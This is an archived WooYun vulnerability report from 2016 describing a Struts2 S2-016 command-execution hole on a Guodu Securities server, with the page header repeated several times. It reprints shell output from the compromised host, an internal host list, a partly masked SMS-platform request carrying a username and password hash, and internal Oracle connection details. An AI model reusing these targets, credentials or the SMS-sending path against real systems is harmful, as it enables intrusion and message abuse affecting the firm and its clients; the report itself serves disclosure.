国都证券某某处命令执行(可内网/可用短信平台发送任意短信)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0204861

漏洞标题：国都证券某某处命令执行(可内网/可用短信平台发送任意短信)

漏洞作者：路人甲

提交时间：2016-05-04 12:13

修复时间：2016-05-10 13:24

公开时间：2016-05-10 13:24

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-04：细节已通知厂商并且等待厂商处理中
2016-05-04：厂商已经确认，细节仅向厂商公开
2016-05-10：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

详细说明：

http://wx.guodu.com/ tomcat
拿出神器扫到了mic目录
一顿 admin XXXXX 各种尝试没成功，抓了包看到了下面验证连接
http://211.144.149.2/mic/admin/check.action 嗯继续神器 S2-016
webpath:C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps\mic\
whoami:2003server\administrator
shell

Windows IP Configuration
   Host Name . . . . . . . . . . . . : 2003server
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : HP NC373i Multifunction Gigabit Server Adapter
   Physical Address. . . . . . . . . : 00-19-BB-2D-5C-34
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 192.168.7.94
   Subnet Mask . . . . . . . . . . . : 255.255.255.192
   Default Gateway . . . . . . . . . : 192.168.7.126
   DNS Servers . . . . . . . . . . . : 202.106.0.20
Ethernet adapter 本地连接 2:
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : HP NC373i Multifunction Gigabit Server Adapter #2
   Physical Address. . . . . . . . . : 00-19-BB-2D-BB-6A
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 192.168.7.24
   Subnet Mask . . . . . . . . . . . : 255.255.255.224
   Default Gateway . . . . . . . . . : 
   DNS Servers . . . . . . . . . . . : 8.8.8.8

\\2003SERVER                                                                   
\\GDZQ-7651EBDFE8                                                              
\\GDZQ-795E336EDB                                                              
\\HP360G9                                                                      
\\HPDL360                                                                      
\\HX-SAMBA             Samba Server                                            
\\MESSAGER             messager                                                
\\WIN-066GPLR88JU                                                              
\\WIN-0A0MPF8TMEU                                                              
\\WIN-FSHV3DDVUO6                                                              
\\WIN-IN628LJA7CS                                                              
\\WIN-J37A7RH28GL                                                              
\\WIN-MFSE1E83RLD                                                              
\\WIN-ODNVU8TOBF0                                                              
\\WIN-P18OAFJNR2I                                                              
\\WINDOWS-H3D8UMJ                                                              
\\WINDOWS-J8IU964                                                              
\\WINDOWS-M6JG4FA                                                              
\\WINDOWS-NVUC7Q8                                                              
\\WSJYZX

短信平台

mask 区域

1.://**.**.**//211.144.149.1/smsSendServlet.htmcommand=sendSMSMD5&incode=UTF-8&rstype=text&username=wskh&pwd=7D99874519704FB23F227EC8F5D616AD_
**********
***** ws*****

登陆后可随意发送短信

<T>XDB</T> 
<X> 
oracle.jdbc.driver.OracleDriver 
jdbc:oracle:thin:@192.168.7.130:1521
weixin
weixin
gdappdb
</X>

数据库就不看了

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2016-05-04 13:00

厂商回复：

确认漏洞，正组织修复

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0204861

漏洞标题：国都证券某某处命令执行(可内网/可用短信平台发送任意短信)

相关厂商：国都证券

漏洞作者：路人甲

提交时间：2016-05-04 12:13

修复时间：2016-05-10 13:24

公开时间：2016-05-10 13:24

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0204861

漏洞标题：国都证券某某处命令执行(可内网/可用短信平台发送任意短信)

相关厂商：国都证券

漏洞作者： 路人甲

提交时间：2016-05-04 12:13

修复时间：2016-05-10 13:24

公开时间：2016-05-10 13:24

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0204861"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云